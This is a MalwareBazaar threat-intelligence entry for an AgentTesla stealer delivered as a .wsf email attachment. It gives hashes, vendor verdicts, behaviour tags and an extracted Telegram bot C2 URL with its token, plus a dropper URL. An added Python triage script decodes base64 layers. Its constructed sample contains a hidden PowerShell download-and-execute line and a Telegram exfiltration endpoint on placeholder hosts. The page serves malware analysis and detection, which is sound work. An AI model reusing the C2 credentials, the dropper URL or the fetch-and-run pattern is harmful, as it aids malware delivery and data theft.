MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



AgentTesla


Vendor detections: 9



SHA256 hash: 73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812
SHA3-384 hash: b2d08ed14b1bb655bcfb62ca42ef44b1a7ccfb70e92033a5d3d91dadae1dc769223d8ba47581e53dc46485990085de57
SHA1 hash: 4ebb9876723c2fc5fda46b098094cf0104efac55
MD5 hash: 3b970c76dbc74cd9b119f487a22c1683
humanhash: fifteen-west-winter-burger
File name: z1ShippingDocs_waybillNO2005xxx351.wsf
Signature: AgentTesla
File size: 193'844 bytes
First seen: 2025-01-28 07:30:06 UTC
Last seen: Never
File type:
MIME type: text/xml
ssdeep: 3072:z/zQ6Vv//riU/tEqZjCwNZiU/tEyWiU/tEqZjCwNZiU/tEAI6:0U/tESLNQU/tEylU/tESLNQU/tEa
TLSH: T1DF146B896645DAD647733A74802F2706BDD8CA132D28E0A478DFCBE13774994E2F3678
TrID: 50.0% (.WSF) Windows Script File (8000/1/2)
      31.2% (.XML) Generic XML (ASCII) (5000/1)
      18.7% (.HTML) HyperText Markup Language (3000/1/1)
Magika: txt
Reporter: FXOLabs
Tags: AgentTesla wsf

Intelligence


File Origin
# of uploads: 1
# of downloads: 100
Origin country: BR
Vendor Threat Intelligence

Verdict: Malicious
Score: 94.9%
Tags: xtreme shell overt

Verdict: Suspicious
Threat level: 5/10
Confidence: 100%
Tags: masquerade obfuscated

Result
Verdict: MALICIOUS
Details:
Base64 Encoded Powershell Directives: Detected one or more base64 encoded Powershell directives.
Base64 Encoded URL: Detected an ANSI or UNICODE http:// or https:// base64 encoded URL prefix.

Result
Threat name: n/a
Detection: suspicious
Classification: n/a
Score: 23 / 100
Signature: Potential malicious VBS script found (has network functionality)
Result
Malware family: agenttesla
Score: 10/10
Tags: family:agenttesla collection discovery execution keylogger persistence spyware stealer trojan
Behaviour:
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
outlook_office_path
outlook_win_path
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Suspicious use of SetThreadContext
Accesses Microsoft Outlook profiles
Adds Run key to start application
Checks computer location settings
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
AgentTesla
Agenttesla family
Malware Config:
C2 Extraction: https://api.telegram.org/bot6050556352:AAE_-mublQ2CllMbT9xkQVBjSBbdvdYR1kM/
Dropper Extraction: https://res.cloudinary.com/daxwua63y/image/upload/v1737543662/new_image_h8btwc.jpg%20
Please note that we are no longer able to provide a coverage score for VirusTotal.
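Two of the vendor details above, "Base64 Encoded Powershell Directives" and "Base64 Encoded URL" (an ANSI or UNICODE http:// or https:// prefix inside base64), describe checks that an analyst can reproduce on a .wsf attachment before it is ever opened. The Python below is an added example, not MalwareBazaar's code and not any listed vendor's engine: it derives the base64 prefixes that ASCII and UTF-16LE URL schemes produce, pulls the script bodies out of a WSF, decodes base64 runs (following nested layers), and extracts URLs and Telegram bot API endpoints from whatever it decodes. The WSF it parses is constructed for the example; its hostnames and bot token are placeholders, and none of the real sample's IOCs are reused.

```python
"""Triage helper for a .wsf mail attachment like the entry above.

Added example, not MalwareBazaar's or any vendor's code. It re-implements the
"Base64 Encoded URL" prefix check and the "Base64 Encoded Powershell
Directives" check, and extracts URLs / Telegram bot endpoints from decoded
layers. The WSF at the bottom is constructed; hostnames and the bot token are
placeholders, not the real sample's IOCs.
"""
import base64
import json
import re


def b64_url_prefixes():
    """Map base64 prefix -> description for http(s):// in ASCII and UTF-16LE.

    Base64 turns every complete 3-byte group into 4 characters that do not
    depend on the bytes after it, so the first 3*k bytes of a scheme always
    yield the same leading characters. Matching them flags an encoded URL
    without decoding, which is what the vendor's "Base64 Encoded URL" detail
    describes (ANSI = 1 byte per char, UNICODE = UTF-16LE, 2 bytes per char).
    """
    out = {}
    for scheme in ("http://", "https://"):
        for label, codec in (("ANSI", "ascii"), ("UNICODE", "utf-16-le")):
            raw = scheme.encode(codec)
            head = raw[: len(raw) - len(raw) % 3]
            out[base64.b64encode(head).decode()] = f"{label} {scheme}"
    return out


URL_PREFIXES = b64_url_prefixes()          # e.g. "aHR0cDov" -> "ANSI http://"

# WSF is XML-shaped, but real samples are often not well-formed XML, so the
# script bodies are pulled with a tolerant regex instead of an XML parser.
_SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_CDATA_RE = re.compile(r"<!\[CDATA\[(.*?)\]\]>", re.S)
_B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
_URL_RE = re.compile(r"https?://[^\s'\"<>)]+")
# The path segment after /bot is the bot's API token: a Telegram C2 is also a credential.
_TG_RE = re.compile(r"api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+")
_PS_MARKERS = ("powershell", "-encodedcommand", "-enc ", "iex", "invoke-expression",
               "downloadstring", "net.webclient", "frombase64string")


def script_bodies(wsf_text):
    """Yield the text of each <script> element, unwrapping CDATA sections."""
    for body in _SCRIPT_RE.findall(wsf_text):
        cdata = _CDATA_RE.findall(body)
        yield "".join(cdata) if cdata else body


def _decode_b64(blob):
    """Decode a base64 run to text, choosing UTF-16LE when every other byte is NUL."""
    try:
        raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
    except ValueError:                       # binascii.Error is a ValueError
        return None
    odd = raw[1::2]
    if len(raw) >= 4 and odd.count(0) > len(odd) // 2:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("latin-1")


def _printable(text):
    """Reject decodes that are mostly control bytes (random alphanumeric runs)."""
    if not text:
        return False
    return sum(c.isprintable() or c.isspace() for c in text) / len(text) >= 0.9


def _scan(text, findings, depth):
    findings["urls"].update(_URL_RE.findall(text))
    findings["telegram_c2"].update(_TG_RE.findall(text))
    low = text.lower()
    if depth > 0 and any(k in low for k in _PS_MARKERS):
        findings["powershell"].append(text[:60])  # a directive that was base64-wrapped
    if depth >= 3:                               # stop runaway nesting
        return
    for m in _B64_RE.finditer(text):
        blob = m.group(0)
        for prefix, desc in URL_PREFIXES.items():
            if blob.startswith(prefix):          # prefix-only hit, no decode needed
                findings["b64_url_prefix"].append(desc)
        inner = _decode_b64(blob)
        if inner is not None and _printable(inner):
            _scan(inner, findings, depth + 1)    # layered encoding is the norm


def triage_wsf(wsf_text):
    """Return prefix hits, decoded PowerShell directives, URLs and Telegram C2s."""
    findings = {"b64_url_prefix": [], "powershell": [], "urls": set(), "telegram_c2": set()}
    for body in script_bodies(wsf_text):
        _scan(body, findings, 0)
    return findings


# --- constructed sample (NOT the real attachment; placeholder hosts/token) ----
_INNER_PS = ("IEX (New-Object Net.WebClient).DownloadString("
             "'https://example.invalid/images/new_image.jpg')")
_OUTER_CMD = ("powershell -nop -w hidden -EncodedCommand "
              + base64.b64encode(_INNER_PS.encode("utf-16-le")).decode()
              + " ; $u='https://api.telegram.org/bot000000000:EXAMPLE_TOKEN/sendDocument'")
_URL16 = base64.b64encode("https://example.invalid/beacon".encode("utf-16-le")).decode()
SAMPLE_WSF = f"""<?xml version="1.0"?>
<job id="ShippingDocs">
<script language="VBScript"><![CDATA[
Dim cmd, sh
cmd = "{base64.b64encode(_OUTER_CMD.encode()).decode()}"
u = "{_URL16}"
' a real sample decodes cmd and runs it via WScript.Shell; this example never executes it
]]></script>
</job>
"""

if __name__ == "__main__":
    print(json.dumps(triage_wsf(SAMPLE_WSF), indent=2, default=sorted))
```

Run it as a script to print the findings for the constructed sample, or pass the real attachment's contents to triage_wsf and compare the result with the C2 and dropper extraction above. The prefix match only fires when the URL starts at a 3-byte-aligned offset in the encoded data, which is why the decode pass is kept as well; the decode pass is also what reaches the UTF-16LE payload behind a -EncodedCommand.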

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Malspam
AgentTesla
73b63a59ea3c5c6f049420fb7a4a4dc4e91036c24e2b25bae406aac1f56a1812 (this sample)

Delivery method: Distributed via e-mail attachment
